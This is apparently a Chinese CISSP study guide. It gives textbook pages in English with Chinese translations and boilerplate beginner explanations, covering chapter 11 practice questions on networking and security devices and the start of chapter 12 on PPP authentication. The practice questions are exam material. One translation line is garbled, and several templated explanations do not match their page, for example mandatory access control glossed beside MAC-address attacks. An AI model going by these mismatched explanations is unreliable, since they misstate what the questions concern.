标记为SYN/ACK的数据包 2. UDP 是一种面向无连接的协议,工作在 OSI 模型的传输层,并使用端口 管理并发连接。 以下哪个术语也与 UDP 相关? A. 比特 B. 逻辑寻址 C. 数据重新格式化 D. 单工 3. 以下哪项是IPv6和IPv4在同一网络中共存的手段? (可多选) A. 双栈 B. 隧道技术 C. IPSec D. NAT‑PT E. IP侧载 4. 您的CISO发布的安全配置指南要求,与内部Web服务通信时,所有 HTTP通信都必须是安全的。 关于使用TLS,以下哪项是正确的? (可多 选。 ) A. 允许使用TCP端口443 B. 防止篡改、伪装和窃听 C. 需要双向认证 D. 向后兼容SSL会话 E. 可用作VPN解决方案 5. 您的网络支持TCP/IP。 TCP/IP是一种多层协议,主要基于IPv4,但该 组织计划在未来一年内部署IPv6。 多层协议的既有益处又可能带来危害的 含义是什么? A. 吞吐量 B. 封装

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

首席信息安全官:CISO 负责组织安全计划、策略、沟通和监督。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

指南:指南是建议做法,不一定强制。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

CISO 需要足够独立性和高层支持。

ISO 偏标准和管理体系。

Recommended、not compulsory 常对应 guideline。

网络题先定位层次,再判断协议、设备或攻击位置。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
首席信息安全官 CISO 负责组织安全计划、策略、沟通和监督。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
指南 指南是建议做法,不一定强制。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 115 / PDF P833

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

C. Hash integrity checking D. Logical addressing 6. A new VoIP system is being deployed at a government contractor organization. They require high availability of five nines of uptime for the voice communication system. They are also concerned about introducing new vulnerabilities into their existing data network structure. The IT infrastructure is based on fiber optics and supports over 1 Gbps to each device; the network often reaches near full saturation on a regular basis. What option will provide the best outcome of performance, availability, and security for the VoIP service? A. Create a new VLAN on the existing IT network for the VoIP service. B.

Replace the current switches with routers and increase the interface speed to 1,000 Mbps. C. Implement a new, separate network for the VoIP system. D. Deploy flood guard protections on the IT network. 7. Micro-segmentation is dividing up an internal network in numerous subzones, potentially as small as a single device, such as a high-value server or even a client or endpoint device. Which of the following is true in regard to micro-segmentation? (Choose all that apply.) A. It is the assignment of the cores of a CPU to perform different tasks. B. It can be implemented using ISFWs. C. Transactions between zones are filtered. D. It supports edge and fog computing management. E.

It can be implemented with virtual systems and virtual networks. 8. A new startup company is designing a sensor that needs to connect wirelessly to a PC or IoT hub to transmit its gathered data to a local application or cloud service for data analysis. The company wants to ensure that all transferred data from the device cannot be disclosed to unauthorized entities. The device is also intended to be located within 1 meter of the PC or IoT hub it communicates with. Which of the following concepts is the best choice for this device? A. Zigbee B. Bluetooth C.

中文直译 / 整理

哈希完整性检查 D. 逻辑寻址 6. 一家政府承包商组织正在部署一个新的VoIP系统。 他们要求语音通信系统 的可用性达到五个九(99.999%)。 同时,他们也担心在现有数据网络结构 中引入新的漏洞。 IT基础设施基于光纤,每个设备的带宽支持超过1 Gbps; 网络通常经常接近满载。 哪种方案能为VoIP服务提供最佳的性能、可用性和 安全性? A. 在现有的IT网络上为VoIP服务创建一个新的VLAN。 B. 将当前的交换机替换为路由器,并将接口速度提升至1,000 Mbps。 C. 为VoIP系统实施一个全新的独立网络。 D. 在IT网络上部署防洪水保护措施。 7. 微分段是将内部网络划分为多个子区域,小至单个设备,例如高价值服务 器甚至客户端或终端设备。 以下关于微分段的陈述哪些是正确的? (选择所 有适用项。 ) A. 它是指将CPU的核心分配给不同的任务。 B. 它可以使用ISFW实现。 C. 区域之间的通信会被过滤。 D. 它支持边缘计算和雾计算管理。 E. 它可以使用虚拟系统和虚拟网络实现。

8. 一家新创公司正在设计一种传感器,该传感器需要通过无线方式连接到 PC或物联网网关,以将其收集的数据传输到本地应用程序或云服务进行数据 分析。 该公司希望确保从设备传输的所有数据都不会被未经授权的实体泄露。 该设备计划位于与其通信的PC或物联网网关1米以内。 以下哪个概念最适合该 设备? A. Zigbee B. Bluetooth

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

授权:授权是认证之后决定你能访问什么、能做什么。

程序:程序是一步一步怎么做。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

认证成功不等于什么都能做;权限仍要单独授权。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
授权 授权是认证之后决定你能访问什么、能做什么。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 116 / PDF P834

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

C. GEO D. 5G 9. James has been hired to be a traveling repair technician. He will be visiting customers all over the country to provide support services. He has been issued a portable workstation with 4G and 5G data service. What are some concerns when using this capability? (Choose all that apply.) A. Eavesdropping B. Rogue towers C. Data speed limitations D. Reliability of establishing a connection E. Compatibility with cloud services F. Unable to perform duplex communications 10. A new startup company needs to optimize delivery of high-definition media content to its customers.

They are planning the deployment of resource service hosts in numerous data centers across the world to provide low latency, high performance, and high availability of the hosted content. What technology is likely being implemented? A. VPN B. CDN C. SDN D. CCMP 11. Which of the following is a true statement about ARP poisoning or MAC spoofing? A. MAC spoofing is used to overload the memory of a switch. B. ARP poisoning is used to falsify the physical address of a system to impersonate that of another authorized device. C. MAC spoofing relies on ICMP communications to traverse routers. D. ARP poisoning can use unsolicited or gratuitous replies. 12.

An organization stores group project data files on a central SAN. Many projects have numerous files in common but are organized into separate C. GEO D. 5G 9.

中文直译 / 整理

詹姆斯被聘为一名流动维修技术员。 他将 visitin g customers all over the countr y to provide su ppport services. He 已发放配备4G和5G数据服务的便携式工作站。 使用此功能时有哪些注意事项? (可多选。 ) A. 窃听 B. 伪造基站 C. 数据速度限制 D. 建立连接的可靠性 E. 与云服务的兼容性 F. 无法执行双工通信 10. 一家新的初创公司需要优化向其客户交付高清媒体内容。 他们计划在全球 众多数据中心部署资源服务主机,以提供低延迟、高性能和高可用性的托管服 务 内容。 可能正在实施什么技术? A. VPN B. CDN C. SDN D. CCMP 11. 以下哪项关于ARP欺骗或MAC欺骗的陈述是正确的? A. MAC欺骗用于耗尽交换机的内存。 B. ARP欺骗用于伪造系统的物理地址,以冒充另一台授权设备的地址。 C. MAC欺骗依赖ICMP通信来穿越路由器。 D. ARP欺骗可以使用非请求或自发的回复。 12. 一个组织将群组项目数据文件存储在中央SAN上。 许多项目具有大量共同文 件,但被分别组织成

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

授权:授权是认证之后决定你能访问什么、能做什么。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

认证成功不等于什么都能做;权限仍要单独授权。

ISO 偏标准和管理体系。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
授权 授权是认证之后决定你能访问什么、能做什么。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 117 / PDF P835

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

project containers. A member of the incident response team is attempting to recover files from the SAN after a malware infection. However, many files are unable to be recovered. What is the most likely cause of this issue? A. Using Fibre Channel B. Performing real-time backups C. Using file encryption D. Deduplication 13. Jim was tricked into clicking on a malicious link contained in a spam email message. This caused malware to be installed on his system. The malware initiated a MAC flooding attack.

Soon, Jim's system and everyone else's in the same local network began to receive all transmissions from all other members of the network as well as communications from other parts of the next-to-local members. The malware took advantage of what condition in the network? A. Social engineering B. Network segmentation C. ARP queries D. Weak switch configuration 14. A ______________ is an intelligent hub because it knows the hardware addresses of the systems connected on each outbound port. Instead of repeating traffic on every outbound port, it repeats traffic only out of the port on which the destination is known to exist. A. Repeater B. Switch C. Bridge D. Router 15.

What type of security zone can be positioned so that it operates as a buffer between the secured private network and the Internet and can host publicly accessible services? A. Honeypot B. Screened subnet

中文直译 / 整理

项目容器。 事件响应团队的一个成员正在尝试从SAN中恢复恶意软件感 染后的文件。 然而,许多文件无法恢复。 这个问题最可能的原因是什么? A. 使用光纤通道 B. 执行实时备份 C. 使用文件加密 D. 重复数据删除 13. 吉姆被诱骗点击了垃圾邮件中的恶意链接,导致恶意软件安装在他的系 统上。 该恶意软件发起了一次MAC地址泛洪攻击。 不久,吉姆的系统以及 同一局域网内其他所有人的系统都开始接收来自网络中所有其他成员的传输, 以及邻近网络部分的通信。 该恶意软件利用了网络中的什么条件? A. 社会工程 B. 网络分段 C. ARP 查询 D. 弱交换机配置 14. 一个 ______________ 是一个智能集线器,因为它知道连接在每个出 端口上的系统的硬件地址。 它不会将流量重复发送到每个出端口,而是仅将 流量发送到已知目标存在的端口。 A. 中继器 B. 交换机 C. 桥接器 D. 路由器 15. 哪种安全区域可以设置在受保护的私有网络和互联网之间,作为缓冲 区并托管公开访问的服务? A. 蜜罐 B. 筛选子网

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

事件响应:事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

网络题先定位层次,再判断协议、设备或攻击位置。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

准备、检测、遏制、根除、恢复、经验教训是常见顺序。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 118 / PDF P836

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

C. Extranet D. Intranet 16. An organization wants to use a wireless network internally, but they do not want any possibility of external access or detection. What security tool should be used? A. Air gap B. Faraday cage C. Biometric authentication D. Screen filters 17. Neo is the security manager for the southern division of the company. He thinks that deploying a NAC will assist in improving network security. However, he needs to convince the CISO of this at a presentation next week. Which of the following are goals of NAC that Neo should highlight? (Choose all that apply.) A. Reduce social engineering threats B. Detect rogue devices C.

Map internal private addresses to external public addresses D. Distribute IP address configurations E. Reduce zero-day attacks F. Confirm compliance with updates and security settings 18. The CISO wants to improve the organization's ability to manage and prevent malware infections. Some of her goals are to (1) detect, record, evaluate, and respond to suspicious activities and events, which may be caused by problematic software or by valid and invalid users, (2) collect event information and report it to a central ML analysis engine, and (3) detect abuses that are potentially more advanced than what can be detected by traditional antivirus or HIDSs.

The solution needs to be able to reduce response and remediation time, reduce false positives, and manage multiple threats simultaneously. What solution is the CISO wanting to implement? A. EDR B. NGFW C.

中文直译 / 整理

外联网 D. 内联网 16. 一个组织希望在内部使用无线网络,但他们不希望有任何外部访问或检 测的可能性。 应使用什么安全工具? A. 空气间隙 B. 法拉第笼 C. 生物识别认证 D. 屏幕滤镜 17. Neo 是公司南方部门的安全管理员。 他认为部署 NAC 将有助于提升网络 安全。 然而,他需要在下周的演示中说服 CISO。 以下哪些是 Neo 应当强调的 NAC 目标? (选择所有适用项。 ) A. 减少社会工程学威胁 B. 检测未经授权的设备 C. 将内部私有地址映射到外部公有地址 D. 分发 IP 地址配置 E. 减少零日攻击 F. 确认更新和安全设置的合规性 18. 首席信息安全官(CISO)希望提高组织管理和预防恶意软件感染的能力。 她的部分目标是:(1) 检测、记录、评估和响应可疑活动和事件,这些事件可 能由有问题的软件或有效和无效用户引起; (2) 收集事件信息并将其报告给中 央机器学习分析引擎; 以及 (3) 检测可能比传统防病毒软件或 HIDS 更高级 的滥用行为。 该解决方案需要能够缩短响应和修复时间,减少误报,并 同时管理多种威胁。 首席信息安全官希望实施什么解决方案?

A. EDR B. NGFW

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

首席信息安全官:CISO 负责组织安全计划、策略、沟通和监督。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

CISO 需要足够独立性和高层支持。

ISO 偏标准和管理体系。

网络题先定位层次,再判断协议、设备或攻击位置。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
首席信息安全官 CISO 负责组织安全计划、策略、沟通和监督。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 119 / PDF P837

第 837 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

C. WAF D. XSRF 19. A(n) _________________ firewall is able to make access control decisions based on the content of communications as well as the parameters of the associated protocol and software. A. Application-level B. Stateful inspection C. Circuit-level D. Static packet filtering 20. Which of the following is true regarding appliance firewalls? (Choose all that apply.) A. They are able to log traffic information. B. They are able to block new phishing scams. C. They are able to issue alarms based on suspected attacks. D. They are unable to prevent internal attacks. C. WAF D. XSRF 19.

中文直译 / 整理

一种_________________ 应用程序级防火墙能够根据通信内容 以及相关协议和软件的参数做出访问控制决策。 A. 应用程序级 B. 状态检测 C. 电路级 D. 静态数据包过滤 20. 关于设备防火墙,以下哪项是正确的? (选择所有适用项。 ) A. 它们能够记录流量信息。 B. 它们能够阻止新的网络钓鱼攻击。 C. 它们能够根据疑似攻击发出警报。 D. 它们无法阻止内部攻击。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 837 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

日志要保护完整性、时间同步和访问控制。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
日志 日志记录系统和用户活动,用于监控、审计和调查。
第 12 章 · P838-915 · 78 个学习单元

安全通信与网络攻击

OSG10 · Chapter 12 · Secure Communications and Network Attacks · 全文覆盖 + 小白精读 + 画报

第 12 章:安全通信与网络攻击

这不是提炼版。本页按 PDF 第 838-915 页连续覆盖第 12 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

78个连续学习单元
4格原文 / 直译 / 解释 / 考点
78页覆盖第12章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P838

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

Chapter 12 Secure Communications and Network Attacks THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 4.0: Communication and Network Security 4.1 Apply secure design principles in network architectures 4.1.7 Performance metrics (e.g., bandwidth, latency, jitter, throughput, signal-to-noise ratio) 4.1.18 Monitoring and management (e.g., network observability, traffic flow/shaping, capacity management, fault detection and handling) 4.3 Implement secure communication channels according to design 4.3.1 Voice, video, and collaboration (e.g., conferencing, Zoom rooms) 4.3.2 Remote access (e.g., network administrative functions) 4.3.3 Data communications (e.g., backhaul networks, satellite) 4.3.4 Third-party connectivity (e.g., telecom providers, hardware support) Communications security is designed to detect, prevent, and even correct data transportation errors (that is, it provides integrity protection as well as confidentiality).

Communications security is used to sustain the security of networks while supporting the need to exchange and share data. This chapter covers the many forms of communications security, vulnerabilities, and countermeasures. The Communication and Network Security domain deals with topics related to network components (i.e., network devices and protocols), specifically how they function and how they are relevant to security. This domain is discussed in this chapter and in Chapter 11, “Secure Network Architecture and

中文直译 / 整理

第12章 安全通信与网络攻击 本章涵盖的CISSP主题包括: 领域4.0:通信与网络安全 4.1 在网络架构中应用安全设计原则 4.1.7 性能指标(例如:带宽、延迟、抖动、吞吐量、信噪比) 4.1.18 监控与管理(例如,网络可观测性、流量流/整形、容量 管理、故障检测与处理) 4.3 根据设计实施安全通信通道 4.3.1 语音、视频和协作(例如,会议、Zoom 房间) 4.3.2 远程访问(例如,网络管理功能) 4.3.3 数据通信(例如,回传网络、卫星) 4.3.4 第三方连接(例如电信运营商, 硬件支持) 通信安全旨在检测、防止甚至纠正数据传输错误(即,它不仅提供机密性保护, 还提供完整性保护)。 通信安全用于在支持数据交换和共享需求的同时维持网 络的安全性。 本章涵盖通信安全的多种形式、漏洞及应对措施。 通信与网络安全领域涉及与网络组件(即网络设备和协议)相关的话题,具体 讨论它们的功能及其与安全性的关联。 本章及第11章,“安全网络架构与

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
NIST NIST 提供美国常用安全标准、框架和指南。
学习单元 02 / PDF P839

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Components.” Be sure to read and study the material in both chapters to ensure complete coverage of the essential material. Protocol Security Mechanisms Transmission Control Protocol/Internet Protocol (TCP/IP) is the primary protocol suite used on most networks and on the Internet. It is a robust protocol suite, but it has numerous security deficiencies. In an effort to improve the security of TCP/IP, many subprotocols, mechanisms, or applications have been developed to protect the confidentiality, integrity, and availability of transmitted data.

It is important to remember that even with the foundational protocol suite of TCP/IP, there are literally hundreds, if not thousands, of individual protocols, mechanisms, and applications in use across the Internet. Some of them are designed to provide security services. Some protect integrity, others protect confidentiality, and others provide authentication and access control. In the next sections, we'll discuss some common network and protocol security mechanisms. Authentication Protocols The Point-to-Point Protocol (PPP) is an encapsulation protocol designed to support the transmission of IP traffic over dial-up or point-to-point links.

PPP is a Data Link Layer protocol that allows for multivendor interoperability of WAN devices supporting serial links. Although it is rarely found on typical Ethernet networks today, it is the foundation on which many modern communications are based, as well as the foundation of communication authentication. PPP includes a wide range of communication services, such as the assignment and management of IP addresses, management of synchronous communications, standardized encapsulation, multiplexing, link configuration, link quality testing, error detection, and feature or option negotiation (such as compression). PPP is an Internet standard documented in RFC 1661.

It replaced the Serial Line Internet Protocol (SLIP). SLIP offered no authentication, supported only half-duplex communications, had no error-detection capabilities, and required manual link establishment and teardown. PPP supports automatic connection configuration, error detection, full-duplex communications, and options for authentication. The original PPP options for authentication were PAP, CHAP, and EAP.

中文直译 / 整理

组件。 ”请务必阅读并学习这两章的内容,以确保全面掌握关键材料。 协议安全机制 传输控制协议/互联网协议(TCP/IP)是大多数网络和互联网上使用的主要协议 套件。 它是一个强大的协议套件,但存在许多安全缺陷。 为了提高TCP/IP的安 全性,已开发出许多子协议、机制或应用程序,以保护传输数据的机密性、完 整性和可用性。 必须记住,即使有了TCP/IP这一基础协议套件,互联网上仍在 使用成百上千个独立的协议、机制和应用程序。 其中一些旨在提供安全服务, 有些保护完整性,有些保护机密性,另一些则提供身份验证和访问控制。 在下 一节中,我们将讨论一些常见的网络和协议安全机制。 身份验证协议 点对点协议(PPP)是一种封装协议,旨在支持通过拨号或点对点链路传输IP 流量。 PPP是一种数据链路层协议,允许支持串行链路的多厂商WAN设备实现 互操作。 尽管在当今的典型以太网网络中已很少见,但它构成了许多现代通信 的基础,也是通信身份验证的基础。 PPP包含广泛的通信服务,例如IP地址的 分配与管理、同步通信管理、标准化封装、多路复用、链路配置、链路质量测 试、错误检测以及功能或选项协商(如压缩)。

PPP 是由 RFC 1661 文档化的 Internet 标准。 它取代了 SerialLine Internet Protocol (SLIP)。 SLIP 不提供身份验证,仅支持半双工通信,没有错误检测功 能,且需要手动建立和拆除链路。 PPP 支持自动连接配置、错误检测、全双工 通信以及身份验证选项。 最初的 PPP 身份验证选项包括 PAP、CHAP 和 EAP。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

